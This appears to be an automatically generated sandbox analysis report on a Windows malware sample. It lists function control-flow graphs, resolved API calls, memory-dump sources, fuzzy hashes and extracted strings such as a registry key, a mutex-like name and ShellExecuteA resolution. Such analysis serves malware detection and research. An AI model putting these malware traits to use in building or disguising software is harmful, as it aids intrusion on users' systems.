                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2661597DD84204EFE714EBA8EC5DB6A33B8A708705F108D19E60AE26C0DF765566CF21
                                                                                                                                                                                                                                    Function 028A4D96 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 395COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 744 28a4d96-28a4e3a call 28b8060 747 28a4e3c 744->747 748 28a4e41-28a4eb1 75A38400 744->748 749 28a5459-28a5469 747->749 753 28a5112-28a5134 748->753 754 28a4eb7-28a4ed2 748->754 757 28a513a-28a5163 75A38400 753->757 758 28a529e-28a52a5 753->758 761 28a4ee0-28a4f04 call 28ac89a 754->761 762 28a4ed4-28a4edb 754->762 763 28a51a0-28a51d0 757->763 764 28a5165-28a518e 757->764 759 28a542a-28a5431 758->759 760 28a52ab-28a53fe call 28b772b * 5 call 28a6330 758->760 766 28a5433-28a543a 7686EB20 759->766 767 28a5440-28a5447 759->767 829 28a5403-28a5408 760->829 782 28a4f1d-28a4f24 761->782 783 28a4f06-28a4f1a call 28a6330 761->783 762->749 770 28a51d7-28a51d9 763->770 769 28a5195-28a5197 764->769 766->767 767->749 773 28a5199 769->773 774 28a519e 769->774 775 28a51db 770->775 776 28a51e0-28a5202 770->776 774->776 775->776 779 28a5208-28a520e 776->779 780 28a5299 776->780 784 28a523f-28a524d 779->784 785 28a524f-28a525b 779->785 786 28a527c-28a5296 call 28a49f9 779->786 787 28a525d-28a527a call 28a49f9 779->787 788 28a5223-28a522f 779->788 789 28a5231-28a523d 779->789 790 28a5215-28a5221 779->790 780->758 795 28a4f2a-28a4f4c 782->795 796 28a50f0-28a50f7 782->796 783->782 784->780 785->780 786->780 787->780 788->780 789->780 790->780 806 28a4f52-28a4f96 75A38400 795->806 807 28a5085-28a50ed 7686EB20 call 28b772b * 2 795->807 803 28a50f9-28a50ff 796->803 804 28a5106-28a510d 796->804 803->804 804->749 810 28a4f9c-28a4fa2 806->810 811 28a5027-28a502e 806->811 807->796 810->784 810->785 810->786 810->787 810->788 810->789 810->790 816 28a4fa9-28a4fb3 810->816 817 28a4fcd-28a4fd7 810->817 818 28a4fc1-28a4fcb 810->818 819 28a5007-28a5020 call 28a4a5b 810->819 820 28a4fe5-28a5005 call 28a4a5b 810->820 821 28a4fd9-28a4fe3 810->821 822 28a4fb5-28a4fbf 810->822 814 28a5053-28a5079 811->814 815 28a5030-28a5051 811->815 835 28a5080 814->835 815->835 816->811 817->811 818->811 819->811 820->811 821->811 822->811 833 28a540a-28a5423 call 28b772b 829->833 834 28a5425 829->834 833->759 834->759
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000), ref: 028A4E86
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: A38400
                                                                                                                                                                                                                                    • String ID: Software\Erlloywmr$\%d$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 2082808161-3772162829
                                                                                                                                                                                                                                    • Opcode ID: 5144617e83d37c0985665bb88e283ad757237a26b6172bcb8632a27bf3f5787b
                                                                                                                                                                                                                                    • Instruction ID: 466224ed7ea1e3076c823c400c538e57cf293c37c1eb1387ffd01556eb5c1092
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5144617e83d37c0985665bb88e283ad757237a26b6172bcb8632a27bf3f5787b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AA02AEBDD01218DBEB20CF54CC94BE9B7B9BB48304F0886D9E519A7280DB769B94CF51
                                                                                                                                                                                                                                    Function 028A5760 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 247COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 839 28a5760-28a57e1 840 28a57ec 839->840 841 28a57e3-28a57ea 839->841 843 28a5c01-28a5c05 840->843 841->840 842 28a57f1-28a5825 841->842 846 28a5827-28a582b 842->846 847 28a5854-28a5858 842->847 848 28a582d 846->848 849 28a5832-28a584d 846->849 850 28a5a4b-28a5a89 847->850 851 28a585e-28a5868 847->851 848->843 849->847 858 28a584f 849->858 855 28a5beb-28a5bf2 850->855 856 28a5a8f-28a5a99 850->856 853 28a5872-28a589e 851->853 862 28a58a0-28a58a9 853->862 863 28a58d4-28a590b 853->863 855->843 859 28a5bf4-28a5bfb 7686EB20 855->859 856->855 860 28a5a9f-28a5aca 856->860 858->843 859->843 866 28a5bd9-28a5be6 860->866 867 28a5ad0-28a5b2c 75A38400 860->867 864 28a58ab 862->864 865 28a58ad-28a58ba 862->865 869 28a5911-28a5923 863->869 870 28a5a46 863->870 864->863 871 28a58c1-28a58d2 865->871 866->855 872 28a5b33-28a5b35 867->872 873 28a5935 869->873 874 28a5925-28a5933 869->874 870->855 871->853 876 28a5b46-28a5b82 872->876 877 28a5b37-28a5b41 872->877 873->870 874->873 878 28a593a-28a5944 874->878 879 28a5bd4 876->879 880 28a5b84-28a5b8a 876->880 877->866 881 28a5955-28a595c 878->881 879->866 882 28a5b91-28a5b9f 880->882 883 28a5ba1-28a5bb2 880->883 884 28a5bb4-28a5bc3 880->884 885 28a5bc5-28a5bd1 880->885 886 28a5962-28a59ae 75A38400 881->886 887 28a5a41 881->887 882->879 883->879 884->879 885->879 888 28a59b0-28a59b6 886->888 889 28a5a01-28a5a35 886->889 887->870 888->882 888->883 888->884 888->885 890 28a59bd-28a59cb 888->890 891 28a59cd-28a59df 888->891 892 28a59f2-28a59fb 888->892 893 28a59e1-28a59f0 888->893 894 28a5a3c 889->894 890->889 891->889 892->889 893->889 894->881
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(00000000), ref: 028A5BFB
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 7686
                                                                                                                                                                                                                                    • String ID: %c%d_%d$%c%d_%d$Software\Erlloywmr$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 3028004676-255879431
                                                                                                                                                                                                                                    • Opcode ID: ac0ac447294d4c569355287c54c22dd3fdd1d4001ea1987c2ac49ce3691aba64
                                                                                                                                                                                                                                    • Instruction ID: d22cfa0d288a98997d43d7fbe0358908677b5033e1342d4e5ea9dfdecf6dfaba
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac0ac447294d4c569355287c54c22dd3fdd1d4001ea1987c2ac49ce3691aba64
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7AC12978D44218DBEB24CF54DC98BE9B7B4AB58304F5081C9D50AAB290DB785BC5CF90
                                                                                                                                                                                                                                    Function 02470005 Relevance: 11.4, Strings: 9, Instructions: 164COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 896 2470005-2470016 897 247002b-247003f 896->897 898 2470018-247004e 896->898 900 24700c6-2470134 call 2470260 call 2470265 897->900 901 2470050-247005c 898->901 902 247005e-2470067 898->902 935 2470136-2470141 900->935 936 2470170-247018e 900->936 903 2470068-247006d 901->903 902->903 906 2470074-247007f 903->906 907 247006f 903->907 910 2470086-24700c0 call 2470286 call 2470260 call 2470286 call 2470260 906->910 911 2470081 906->911 909 24701ba-24701c1 907->909 914 24701c7-24701dd 909->914 915 2470253-247025b 909->915 910->900 911->909 921 2470240 914->921 922 24701df-247020a 914->922 915->909 929 247024b 921->929 922->921 934 247020c-247023e 922->934 929->915 934->921 934->929 937 2470148-247014a 935->937 938 2470196-247019d 936->938 937->936 940 247014c-2470159 937->940 941 247019f 938->941 942 24701a9-24701b8 938->942 940->936 943 247015b-247016c 940->943 946 24701a7 941->946 942->909 942->938 943->936 945 247016e 943->945 945->936 946->938
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2701830651.0000000002470000.00000040.00000001.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2470000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: Ap1mutx7$GetProcAddress$KERNEL32.DLL$LoadLibraryExA$SHELL32.DLL$ShellExecuteA$hh8geqpHJTkdns6$open$purity_control_7728
                                                                                                                                                                                                                                    • API String ID: 0-162185446
                                                                                                                                                                                                                                    • Opcode ID: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction ID: 3afbe4cc38f0ed55dbe7a96c418de94d30b110354a0dde8f8f5beda974e8fff7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a56be1c3fa4327cec34f9cbc9ed2f89fdf08799db80928895b2c9cd50afbc34
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57617E71641288ABEF11DFA0CC49FEA3768EF04705F441516EE19BE2E0D7B1A644CB6E
                                                                                                                                                                                                                                    Function 028A4AF0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 162COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 949 28a4af0-28a4b59 call 28b8060 952 28a4b5b 949->952 953 28a4b60-28a4bc9 75A38400 949->953 954 28a4d75-28a4d79 952->954 958 28a4bcb-28a4be6 953->958 959 28a4bed-28a4c0f 953->959 958->959 964 28a4be8 958->964 962 28a4d68-28a4d6f 7686EB20 959->962 963 28a4c15-28a4c5a 75A38400 959->963 962->954 965 28a4d0a-28a4d11 963->965 966 28a4c60-28a4c66 963->966 964->954 967 28a4d13-28a4d2d 965->967 968 28a4d36-28a4d5c 965->968 969 28a4cae-28a4cba 966->969 970 28a4cbc-28a4ce3 call 28a4a5b 966->970 971 28a4c6d-28a4c78 966->971 972 28a4c7d-28a4c8b 966->972 973 28a4c8d-28a4c9b 966->973 974 28a4c9d-28a4cac 966->974 975 28a4ce5-28a4d03 call 28a4a5b 966->975 980 28a4d34 967->980 982 28a4d63 968->982 969->965 970->965 971->965 972->965 973->965 974->965 975->965 980->982
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000), ref: 028A4B9E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: A38400
                                                                                                                                                                                                                                    • String ID: Software\Erlloywmr$\%d$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 2082808161-3772162829
                                                                                                                                                                                                                                    • Opcode ID: a9628baf7f4705a9de1bf4c0e52ff41b16ec81f16cd7e863ca6d914f1543252f
                                                                                                                                                                                                                                    • Instruction ID: a576445d34babe54ded076101813327544fa1adef2098fd1ca3001b5a1a56e97
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9628baf7f4705a9de1bf4c0e52ff41b16ec81f16cd7e863ca6d914f1543252f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A61607DD44118AFEB18CF54CC59BE9B775EB58705F0085D8E30AAA280DBB0AAC5CF90
                                                                                                                                                                                                                                    Function 028B392D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 984 28b392d-28b3967 call 28b8060 987 28b3968-28b396f 984->987 988 28b397e-28b39b5 771B0BD0 987->988 989 28b3971-28b397c 987->989 992 28b39cf-28b39d6 988->992 993 28b39b7-28b39ca 771AF550 988->993 989->987 994 28b39d8-28b3a12 771B0BD0 992->994 995 28b3a2c-28b3a94 call 28b377a call 28a41c6 * 2 992->995 993->992 994->995 1002 28b3a14-28b3a27 771AF550 994->1002 1008 28b3ab0-28b3ab7 995->1008 1002->995 1009 28b3ab9-28b3ae5 call 28a41c6 1008->1009 1010 28b3ae7-28b3b04 call 28b174a * 2 1008->1010 1009->1008 1019 28b3b09-28b3b0c 1010->1019 1020 28b3b19-28b3b20 1019->1020 1021 28b3b5e 1020->1021 1022 28b3b22-28b3b29 1020->1022 1021->1020 1022->1021 1024 28b3b2b-28b3b32 1022->1024 1024->1021 1025 28b3b34-28b3b5b call 28a4060 call 28b195d 1024->1025 1025->1021
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 771B0BD0.KERNEL32(00000000), ref: 028B39A2
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(00000000,028A2700), ref: 028B39C4
                                                                                                                                                                                                                                    • 771B0BD0.KERNEL32(00000000), ref: 028B39FF
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(00000000,028A2700), ref: 028B3A21
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: F550
                                                                                                                                                                                                                                    • String ID: Z
                                                                                                                                                                                                                                    • API String ID: 963841436-1505515367
                                                                                                                                                                                                                                    • Opcode ID: f8cf23ca9d0e1e9f9ddeca6525d8d5bc02134c97066f42e1b56ace04c19e164e
                                                                                                                                                                                                                                    • Instruction ID: efc8d6b059125077d2aba0c7342e5feb5691fc098b526f10f0c6494dd36d38d1
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f8cf23ca9d0e1e9f9ddeca6525d8d5bc02134c97066f42e1b56ace04c19e164e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8517D7DD80244ABE7229B68DC09BE97774AB08702F004998F34DE62C0CBF465D5CF66
                                                                                                                                                                                                                                    Function 02937AC0 Relevance: 7.7, APIs: 5, Instructions: 207COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1118 2937ac0-2937ad0 1119 2937ae2-2937ae7 1118->1119 1120 2937ae9 1119->1120 1121 2937aeb 1120->1121 1122 2937ad8-2937add 1120->1122 1124 2937af0-2937af2 1121->1124 1123 2937ade-2937ae0 1122->1123 1123->1119 1123->1120 1125 2937af4-2937af9 1124->1125 1126 2937afb-2937aff 1124->1126 1125->1126 1127 2937b01 1126->1127 1128 2937b0c-2937b0f 1126->1128 1131 2937b03-2937b0a 1127->1131 1132 2937b2b-2937b30 1127->1132 1129 2937b11-2937b16 1128->1129 1130 2937b18-2937b1a 1128->1130 1129->1130 1130->1124 1131->1128 1131->1132 1133 2937b43-2937b45 1132->1133 1134 2937b32-2937b3b 1132->1134 1137 2937b47-2937b4c 1133->1137 1138 2937b4e 1133->1138 1135 2937bb2-2937bb5 1134->1135 1136 2937b3d-2937b41 1134->1136 1139 2937bba-2937bbd 1135->1139 1136->1138 1137->1138 1140 2937b50-2937b53 1138->1140 1141 2937b1c-2937b1e 1138->1141 1144 2937bbf-2937bc1 1139->1144 1145 2937b55-2937b5a 1140->1145 1146 2937b5c 1140->1146 1142 2937b20-2937b25 1141->1142 1143 2937b27-2937b29 1141->1143 1142->1143 1147 2937b7d-2937b8c 1143->1147 1144->1139 1148 2937bc3-2937bc6 1144->1148 1145->1146 1146->1141 1149 2937b5e-2937b60 1146->1149 1152 2937b8e-2937b95 1147->1152 1153 2937b9c-2937ba9 1147->1153 1148->1139 1154 2937bc8-2937be4 1148->1154 1150 2937b62-2937b67 1149->1150 1151 2937b69-2937b6d 1149->1151 1150->1151 1151->1149 1155 2937b6f 1151->1155 1152->1152 1156 2937b97 1152->1156 1153->1153 1157 2937bab-2937bad 1153->1157 1154->1144 1158 2937be6 1154->1158 1160 2937b71-2937b78 1155->1160 1161 2937b7a 1155->1161 1156->1123 1157->1123 1159 2937bec-2937bf0 1158->1159 1162 2937bf2-2937c08 771B0BD0 1159->1162 1163 2937c37-2937c3a 1159->1163 1160->1149 1160->1161 1161->1147 1164 2937c09-2937c0e 1162->1164 1165 2937c3d-2937c44 1163->1165 1164->1159 1166 2937c10-2937c12 1164->1166 1167 2937c46-2937c48 1165->1167 1168 2937c68-2937c98 771B04C0 * 2 1165->1168 1169 2937c14-2937c1a 1166->1169 1170 2937c1b-2937c28 771AF550 1166->1170 1171 2937c5b-2937c66 1167->1171 1172 2937c4a-2937c59 1167->1172 1173 2937c9c-2937ca0 1168->1173 1169->1170 1174 2937c31 771B4100 1170->1174 1175 2937c2a-2937c2f 1170->1175 1171->1172 1172->1165 1173->1173 1176 2937ca2 1173->1176 1174->1163 1175->1164
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 771B0BD0.KERNEL32(?), ref: 02937C02
                                                                                                                                                                                                                                    • 771AF550.KERNEL32(?,02934FF9), ref: 02937C20
                                                                                                                                                                                                                                    • 771B4100.KERNEL32(?,02934FF9), ref: 02937C31
                                                                                                                                                                                                                                    • 771B04C0.KERNEL32(02880000,00001000,00000004,?,00000000), ref: 02937C7F
                                                                                                                                                                                                                                    • 771B04C0.KERNEL32(02880000,00001000), ref: 02937C94
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: B4100F550
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2761073125-0
                                                                                                                                                                                                                                    • Opcode ID: b80b8083aaf405fcb1ee6e77209b1dff6932bc48746bfa626d4bac8fef949b26
                                                                                                                                                                                                                                    • Instruction ID: cc39936bd5778060edaac5397c71028f099134f962ee8b4a96b532936f6c6e50
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b80b8083aaf405fcb1ee6e77209b1dff6932bc48746bfa626d4bac8fef949b26
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F151E4F16547528AD7229AF89CC07E1F7B8EB422247180B7DC5E6C73C5E7A45806C760
                                                                                                                                                                                                                                    Function 028A6330 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 408COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1177 28a6330-28a63d7 call 28b8060 1181 28a672a-28a672e 1177->1181 1182 28a63dd-28a6410 call 28b772b 1177->1182 1183 28a695b-28a6980 1181->1183 1184 28a6734-28a6749 1181->1184 1189 28a6412 1182->1189 1190 28a6417-28a645f 1182->1190 1184->1183 1194 28a674f-28a6758 1184->1194 1191 28a6461 1190->1191 1192 28a6466-28a6494 call 28b772b 1190->1192 1199 28a6496-28a64a5 1192->1199 1200 28a64c7 1192->1200 1194->1183 1196 28a675e-28a6767 1194->1196 1196->1183 1198 28a676d-28a6788 call 28a4145 1196->1198 1198->1183 1205 28a678e-28a67f8 75A38400 call 28a42ec call 28a43c5 1198->1205 1199->1200 1202 28a64a7-28a64b4 1199->1202 1202->1200 1204 28a64b6-28a64c5 1202->1204 1204->1200 1206 28a64cc-28a64db 1204->1206 1205->1183 1221 28a67fe-28a680d 1205->1221 1207 28a64dd 1206->1207 1208 28a64e2-28a64ef 1206->1208 1210 28a64f1-28a6500 1208->1210 1211 28a6507-28a65a6 call 28b772b * 4 call 28a47bb 1208->1211 1210->1211 1213 28a6502 1210->1213 1235 28a65a8 1211->1235 1236 28a65ad-28a65b7 1211->1236 1221->1183 1223 28a6813-28a681d 1221->1223 1223->1183 1225 28a6823-28a684a call 28a47bb 1223->1225 1225->1183 1231 28a6850-28a6866 1225->1231 1233 28a6868-28a686e 1231->1233 1234 28a6875-28a68b1 call 28b772b 1231->1234 1233->1234 1250 28a68bf-28a6958 75A38400 call 28a42ec call 28a43c5 call 28b772b call 28a54a2 1234->1250 1251 28a68b3-28a68b8 1234->1251 1237 28a65c8-28a65da 1236->1237 1239 28a6698-28a669f 1237->1239 1240 28a65e0-28a65ec 1237->1240 1242 28a66a1-28a696e 1239->1242 1243 28a66a6-28a671d call 28b772b * 2 call 28a4af0 1239->1243 1244 28a65fd-28a660e 1240->1244 1242->1183 1265 28a6722-28a6725 1243->1265 1248 28a6623-28a6657 1244->1248 1249 28a6610-28a661f 1244->1249 1258 28a6659-28a6663 1248->1258 1259 28a6687-28a6693 1248->1259 1249->1248 1252 28a6621 1249->1252 1250->1183 1251->1250 1252->1244 1258->1259 1262 28a6665-28a666f 1258->1262 1259->1237 1262->1259 1266 28a6671-28a667b 1262->1266 1265->1183 1266->1259 1268 28a667d 1266->1268 1268->1259
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(?,purity_control_%x,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 028A67A0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: A38400
                                                                                                                                                                                                                                    • String ID: purity_control_%x$purity_control_%x
                                                                                                                                                                                                                                    • API String ID: 2082808161-2962537068
                                                                                                                                                                                                                                    • Opcode ID: 4efad60bc12e739add2e88d9081b46f13ab5ee2f15d0cfe65a08e294ea310e94
                                                                                                                                                                                                                                    • Instruction ID: 6e52f0e1333134af8ee99ec18bb1e1eba723130d332c9bd8209972306a9acc05
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4efad60bc12e739add2e88d9081b46f13ab5ee2f15d0cfe65a08e294ea310e94
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CE0291BD9042189BDB24CF14CCA0FEA777ABF95304F0885A8E54DD7244EB729A95CF90
                                                                                                                                                                                                                                    Function 028B2514 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 153COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1276 28b2514-28b2557 call 28b803a 1279 28b276d-28b277e 1276->1279 1280 28b255d-28b258b call 28b8046 1276->1280 1284 28b266f-28b2684 call 28b8040 1280->1284 1285 28b2591-28b2598 1280->1285 1284->1279 1289 28b268a-28b2691 1284->1289 1285->1284 1287 28b259e-28b25ae 1285->1287 1293 28b25c8-28b25d5 1287->1293 1294 28b25b0-28b25c6 1287->1294 1291 28b2768 1289->1291 1292 28b2697-28b26a7 1289->1292 1291->1284 1298 28b26a9-28b26bf 1292->1298 1299 28b26c1-28b26ce 1292->1299 1295 28b25dc-28b2657 75A38400 1293->1295 1294->1295 1295->1284 1313 28b2659-28b266c call 28b1ef6 1295->1313 1302 28b26d5-28b2750 75A38400 1298->1302 1299->1302 1302->1291 1317 28b2752-28b2760 call 28b1ef6 1302->1317 1313->1284 1319 28b2765 1317->1319 1319->1291
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000), ref: 028B260A
